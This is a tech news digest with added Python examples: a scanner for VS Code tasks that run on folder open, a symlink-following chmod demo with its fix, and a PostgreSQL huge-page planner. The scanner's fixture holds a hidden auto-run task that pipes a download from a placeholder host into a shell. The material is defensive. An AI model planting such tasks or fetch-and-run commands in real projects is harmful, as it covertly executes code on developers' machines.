GitHub’s Critical RCE Flaw

A critical vulnerability in GitHub’s internal git infrastructure allowed attackers to execute code remotely on backend servers. On GitHub.com, where many repositories are colocated on shared storage nodes, code execution on a node exposed millions of public and private repositories; on GitHub Enterprise Server it meant full server compromise. The flaw was discovered using AI-augmented reverse engineering.

SAP Supply Chain Attack

Attackers compromised SAP-affiliated npm accounts and used them to push credential-stealing malware through core SAP Cloud Application Programming Model (CAP) packages. The payload harvests GitHub, AWS, Azure, and GCP tokens and poisons victim repositories with a malicious VS Code tasks.json, establishing a persistent foothold in developers’ CI/CD workflows.
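The persistence mechanism in the SAP item rides on a VS Code feature: a task in .vscode/tasks.json with "runOptions": {"runOn": "folderOpen"} starts automatically when the folder is opened in a trusted workspace, and "presentation": {"reveal": "never"} keeps its terminal out of sight. The scanner below is an added illustration, not code from the incident, from SAP or from VS Code; it walks a checkout for auto-run tasks and reports their commands. The tasks.json it scans is constructed for the example and the URL in it is a placeholder, not an indicator from the attack.

```python
"""Scan checkouts for VS Code tasks that auto-run on folder open (added example)."""
import json
import re
import tempfile
from pathlib import Path

# Constructed sample: one benign build task plus one hidden auto-run task.
SAMPLE_TASKS_JSON = r'''{
  // VS Code tasks files are JSONC: comments and trailing commas are legal
  "version": "2.0.0",
  "tasks": [
    {
      "label": "build",
      "type": "shell",
      "command": "npm run build",
    },
    {
      "label": "npm: install",
      "type": "shell",
      "command": "curl -fsSL https://example.invalid/x.sh | sh",
      "presentation": { "reveal": "never" },
      "runOptions": { "runOn": "folderOpen" }
    }
  ]
}'''

def strip_jsonc(text):
    """Drop // and /* */ comments outside strings, then trailing commas."""
    out, i, n = [], 0, len(text)
    while i < n:
        c = text[i]
        if c == '"':                                  # copy a string literal verbatim
            j = i + 1
            while j < n and text[j] != '"':
                j += 2 if text[j] == '\\' else 1
            out.append(text[i:j + 1])
            i = j + 1
        elif text.startswith('//', i):
            j = text.find('\n', i)
            i = n if j < 0 else j
        elif text.startswith('/*', i):
            j = text.find('*/', i + 2)
            i = n if j < 0 else j + 2
        else:
            out.append(c)
            i += 1
    return re.sub(r',(\s*[}\]])', r'\1', ''.join(out))

def load_jsonc(text):
    return json.loads(strip_jsonc(text))

def task_command(task):
    """Flatten command and args; VS Code allows plain strings or {value, quoting}."""
    def val(x):
        return x.get('value', '') if isinstance(x, dict) else str(x)
    parts = [val(task['command'])] if task.get('command') else []
    parts += [val(a) for a in task.get('args') or []]
    return ' '.join(parts)

def find_autorun_tasks(doc):
    """Return the tasks VS Code would start as soon as the folder is opened."""
    hits = []
    for task in doc.get('tasks', []):
        if (task.get('runOptions') or {}).get('runOn') != 'folderOpen':
            continue
        hits.append({'label': task.get('label', '<unlabeled>'),
                     'type': task.get('type'),
                     'command': task_command(task),
                     # a never-revealed terminal hides the run from the developer
                     'hidden': (task.get('presentation') or {}).get('reveal') == 'never'})
    return hits

def scan_tree(root):
    """Report auto-run tasks from every .vscode/tasks.json under root."""
    results = []
    for path in Path(root).rglob('tasks.json'):
        if path.parent.name != '.vscode':
            continue
        try:
            hits = find_autorun_tasks(load_jsonc(path.read_text()))
        except (OSError, ValueError) as exc:       # unreadable or not even JSONC
            hits = [{'label': '<unparseable>', 'type': None,
                     'command': str(exc), 'hidden': False}]
        if hits:
            results.append((str(path.relative_to(root)), hits))
    return results

def demo():
    """Write the constructed sample into a temp checkout and scan it."""
    with tempfile.TemporaryDirectory() as root:
        vscode = Path(root, 'repo', '.vscode')
        vscode.mkdir(parents=True)
        (vscode / 'tasks.json').write_text(SAMPLE_TASKS_JSON)
        return scan_tree(root)

if __name__ == '__main__':
    for path, hits in demo():
        print(path, hits)
```

Run scan_tree('.') from the root of a checkout before opening it in the editor; any hit with hidden set deserves a look before the folder is trusted, and an unparseable tasks.json is itself worth inspecting.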

Hashimoto Quits GitHub

HashiCorp co-founder Mitchell Hashimoto is moving the Ghostty terminal emulator project off GitHub, citing frequent outages that leave the platform ‘no longer a place for serious work.’ After 18 years of daily use, he says the service has become too unreliable for shipping professional software.

Zed Editor Hits 1.0

The Zed editor has reached version 1.0, positioning itself as a high-performance, AI-native alternative to VS Code. By rendering its interface on the GPU, as a game engine would, Zed aims to provide a more responsive collaborative coding environment for humans and AI agents.

Rust’s Safety Limits Exposed

An audit of uutils, the Rust-based reimplementation of GNU coreutils, highlights that memory safety at the language level does not equal system security. The findings show that critical vulnerabilities, including local root code execution in chroot, still occur when developers rely on ergonomic but unsafe filesystem APIs: Rust rules out memory corruption, not logic errors in how a privileged tool touches the filesystem.
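The audit’s specific findings are not reproduced here; the block below is an added illustration of the class it describes, written in Python because the API distinction is the same in every language. A privileged tool that calls a path-based API such as chmod inside a directory a less-privileged user controls will follow a planted symlink and modify whatever it points at; the hardened variant opens each path component with O_NOFOLLOW relative to the previous directory descriptor and then acts on the file descriptor, so there is no path left for an attacker to swap. The victim file, directory layout and modes are constructed for the demo, which needs no root.

```python
"""Path-based vs fd-based filesystem operations on attacker-controlled paths (added example)."""
import errno
import os
import stat
import tempfile

def naive_chmod(path, mode):
    """The ergonomic call: os.chmod() follows symlinks, so a planted link
    redirects the mode change to any file the privileged caller can reach."""
    os.chmod(path, mode)

def open_no_symlinks(root, relpath, flags=os.O_RDONLY):
    """Open root/relpath while refusing a symlink at any component.
    O_NOFOLLOW only guards the final component, so each directory is opened
    on its own and the next step resolves relative to that fd (dir_fd)."""
    fd = os.open(root, os.O_RDONLY | os.O_DIRECTORY | os.O_CLOEXEC)  # root is trusted
    parts = [p for p in relpath.split('/') if p and p != '.']
    try:
        for i, part in enumerate(parts):
            if part == '..':
                raise ValueError('path escapes root: %r' % relpath)
            last = i == len(parts) - 1
            step = flags if last else os.O_RDONLY | os.O_DIRECTORY
            nfd = os.open(part, step | os.O_NOFOLLOW | os.O_CLOEXEC, dir_fd=fd)
            os.close(fd)
            fd = nfd
    except BaseException:
        os.close(fd)
        raise
    return fd

def safe_chmod(root, relpath, mode):
    """Hardened variant: resolve without following links, then fchmod() the fd."""
    fd = open_no_symlinks(root, relpath)
    try:
        os.fchmod(fd, mode)
    finally:
        os.close(fd)

def mode_of(path):
    return stat.S_IMODE(os.stat(path).st_mode)

def demo():
    """Constructed scenario: 'victim' stands in for a file the user cannot
    write; 'home' is a directory the user controls and plants a symlink in."""
    with tempfile.TemporaryDirectory() as root:
        victim = os.path.join(root, 'victim')
        with open(victim, 'w') as f:
            f.write('secret')
        os.chmod(victim, 0o640)
        home = os.path.join(root, 'home')
        os.mkdir(home)
        os.symlink(victim, os.path.join(home, 'notes.txt'))

        naive_chmod(os.path.join(home, 'notes.txt'), 0o666)   # follows the link
        after_naive = mode_of(victim)

        os.chmod(victim, 0o640)                               # reset for the second run
        try:
            safe_chmod(root, 'home/notes.txt', 0o666)
            refused = False
        except OSError as exc:              # ELOOP on Linux/macOS, EMLINK on FreeBSD
            refused = exc.errno in (errno.ELOOP, errno.EMLINK)
        after_safe = mode_of(victim)
        return {'after_naive': after_naive, 'refused': refused,
                'after_safe': after_safe}

if __name__ == '__main__':
    print(demo())
```

Checking with lstat first and then calling the path-based API is not a fix: the user can swap the entry for a symlink between the check and the call. Only the descriptor-based sequence closes that window.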

Linux 7.0 PostgreSQL Regression

A kernel change in Linux 7.0 halved PostgreSQL throughput on machines with many vCPUs. The issue stems from the scheduler preempting a process while it holds a spinlock taken during a memory page fault, leaving other CPUs spinning on the lock; the regression can be mitigated by enabling huge pages, which reduces how often page faults occur.
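Enabling huge pages for PostgreSQL takes two settings that have to agree: huge_pages in postgresql.conf and vm.nr_hugepages in the kernel, sized to cover shared_buffers plus the rest of the shared segment. The planner below is an added example, not code from the kernel or PostgreSQL projects; it parses PostgreSQL size units and a /proc/meminfo excerpt (the excerpt is constructed), computes the page count, and checks whether the kernel already reserves enough. The five percent margin for non-buffer shared memory is an assumption; on PostgreSQL 15 or later, postgres -C shared_memory_size_in_huge_pages reports the exact figure.

```python
"""Size vm.nr_hugepages for PostgreSQL shared memory (added example)."""
import re

# Constructed /proc/meminfo excerpt from a host with no huge pages reserved yet.
SAMPLE_MEMINFO = """\
MemTotal:       65536000 kB
HugePages_Total:       0
HugePages_Free:        0
HugePages_Rsvd:        0
Hugepagesize:       2048 kB
"""

_UNITS = {'B': 1, 'kB': 1024, 'MB': 1024 ** 2, 'GB': 1024 ** 3, 'TB': 1024 ** 4}

def parse_pg_size(value, block_size=8192):
    """Parse a PostgreSQL memory setting. A bare number means shared_buffers
    blocks (8 kB by default); otherwise the unit suffix is used."""
    m = re.fullmatch(r'\s*(\d+)\s*([kMGT]?B)?\s*', str(value))
    if not m:
        raise ValueError('bad size: %r' % value)
    num, unit = int(m.group(1)), m.group(2)
    return num * block_size if unit is None else num * _UNITS[unit]

def parse_meminfo(text):
    """Return the HugePages_* counters and Hugepagesize (bytes) from /proc/meminfo."""
    info = {}
    for line in text.splitlines():
        m = re.match(r'(\w+):\s+(\d+)(?:\s+kB)?', line)
        if m:
            info[m.group(1)] = int(m.group(2))
    return {
        'page_bytes': info['Hugepagesize'] * 1024,
        'total': info.get('HugePages_Total', 0),
        'free': info.get('HugePages_Free', 0),
    }

def pages_for(nbytes, page_bytes):
    return -(-nbytes // page_bytes)          # ceiling division

def plan_huge_pages(shared_buffers, meminfo_text, margin_pct=5):
    """Work out how many huge pages PostgreSQL needs and whether the host has them."""
    mem = parse_meminfo(meminfo_text)
    base = pages_for(parse_pg_size(shared_buffers), mem['page_bytes'])
    needed = base + -(-base * margin_pct // 100)   # assumed margin for other shared memory
    return {
        'page_bytes': mem['page_bytes'],
        'base_pages': base,
        'needed_pages': needed,
        'reserved_ok': mem['total'] >= needed,
        'postgresql_conf': 'huge_pages = on\nshared_buffers = %s' % shared_buffers,
        'sysctl': 'vm.nr_hugepages = %d' % needed,
    }

if __name__ == '__main__':
    plan = plan_huge_pages('4GB', SAMPLE_MEMINFO)
    print(plan['postgresql_conf'])
    print('# /etc/sysctl.d/90-postgres.conf:', plan['sysctl'])
    print('already reserved:', plan['reserved_ok'])
```

Use huge_pages = on rather than try for this mitigation: on refuses to start PostgreSQL when the pages are missing, whereas try falls back silently to 4 kB pages and the regression stays. Reserve the pages before PostgreSQL starts, ideally at boot, because on a fragmented host the kernel can grant fewer pages than requested; compare HugePages_Total after applying the sysctl rather than assuming the request succeeded.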

Maryland Bans Surveillance Pricing

Maryland has become the first US state to ban ‘surveillance pricing’ in grocery stores, prohibiting retailers from using personal data (location, search history, demographics) to charge individual shoppers higher prices. Critics argue the law leaves loopholes for loyalty programs and lacks strong enforcement.